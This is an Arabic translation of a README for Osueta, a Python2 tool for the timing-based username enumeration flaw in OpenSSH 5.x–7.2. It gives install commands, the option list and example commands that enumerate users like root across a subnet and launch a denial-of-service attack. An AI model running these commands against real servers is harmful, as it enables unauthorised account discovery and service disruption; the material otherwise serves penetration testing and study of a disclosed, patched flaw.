
نص بايثون بسيط لاستغلال هجوم توقيت تعداد المستخدمين في OpenSSH.
* ___ ___ ___ _ _ *
* / _ \ _ __ ___ _ _ / __/ __| || | *
* | (_) | '_ \/ -_) ' \\__ \__ \ __ | *
* \___/| .__/\___|_||_|___/___/_||_| *
* |_| *
* _ _ ___ _ _ *
* | | | |___ ___ _ _ | __|_ _ _ _ _ __ ___ _ _ __ _| |_(_)___ _ _ *
* | |_| (_-</ -_) '_| | _|| ' \ || | ' \/ -_) '_/ _` | _| / _ \ ' \ *
* \___//__/\___|_| |___|_||_\_,_|_|_|_\___|_| \__,_|\__|_\___/_||_| *
* *
* _____ _ _ _ _ _ _ *
* |_ _(_)_ __ (_)_ _ __ _ /_\| |_| |_ __ _ __| |__ *
* | | | | ' \| | ' \/ _` | / _ \ _| _/ _` / _| / / *
* |_| |_|_|_|_|_|_||_\__, | /_/ \_\__|\__\__,_\__|_\_\ *
* |___/ *
***************************************************************************
Osueta هي أداة بسيطة مكتوبة بلغة Python2 لاستغلال ثغرة التعداد الزمني لمستخدمي OpenSSH،
الموجودة في إصدارات OpenSSH <= 7.2 و >= 5.* . تمتلك الأداة القدرة على إجراء تغييرات
على اسم المستخدم المستخدم في هجوم القوة العمياء، وإمكانية إنشاء
حالة حرمان من الخدمة (DOS) في خادم OpenSSH.
http://seclists.org/fulldisclosure/2013/Jul/88
تم إصلاح الثغرة في إصدار OpenSSH 7.3:
http://www.openssh.com/txt/release-7.3
c0r3dump3d | coredump<@>autistici.org
rofen | rofen<@>gmx.de
نود أن نتقدم بالشكر لـ Javier Nieto من www.behindthefirewalls.com على دعمه ومساعدته.
مثل أدوات الهجوم الأخرى، يرفع المؤلفون المسؤولية عن أي استخدام لهذه الأداة.
ديبيان (Debian):
# apt-get install python-ipy python-nmap
# pip install paramiko
# pip install IPy
آرتش لينكس (ArchLinux):
# pacman -S python2-ipy python2-nmap python2-paramiko
$ git clone https://github.com/c0r3dump3d/osueta.git
الاستخدام: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
[-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
[-c VERS] [--dos DOS] [-t THREADS]
نص بايثون لهجوم التعداد الزمني لمستخدمي OpenSSH
الوسائط الاختيارية:
-h, --help عرض رسالة المساعدة هذه والخروج
-H HOST عنوان المضيف أو CIDR netblock.
-k HFILE قائمة المضيفين في ملف.
-f FQDN اسم النطاق المؤهل بالكامل للهجوم.
-p PORT منفذ المضيف.
-L UFILE ملف قائمة أسماء المستخدمين.
-U USER استخدام اسم مستخدم واحد فقط.
-d DELAY تأخير زمني محدد بالثواني. إذا لم يتم تحديده، يتم حساب وقت التأخير.
-v VARI إجراء تغييرات على اسم المستخدم (الافتراضي نعم).
-o OUTP ملف الإخراج مع النتائج الإيجابية.
-l LENGTH طول كلمة المرور بالأحرف (x1000) (الافتراضي 40).
-c VERS فحص إصدار OpenSSH أو عدمه (الافتراضي نعم).
--dos DOS محاولة تنفيذ هجوم DOS (الافتراضي لا).
-t THREADS عدد الخيوط لهجوم DOS (الافتراضي 5).
* محاولة تعداد مستخدم واحد مع تغييرات اسم المستخدم:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
* محاولة تعداد مستخدم واحد بدون تغييرات اسم المستخدم مع هجوم DOS:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes
* مسح شبكة من الفئة C باستخدام مستخدم واحد فقط:
./osueta -H 192.168.1.0/24 -p 22 -U root -v no
* مسح شبكة من الفئة C باستخدام أسماء مستخدمين من ملف، وقت تأخير 15 ثانية وكلمة مرور من 50000 حرف:
./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50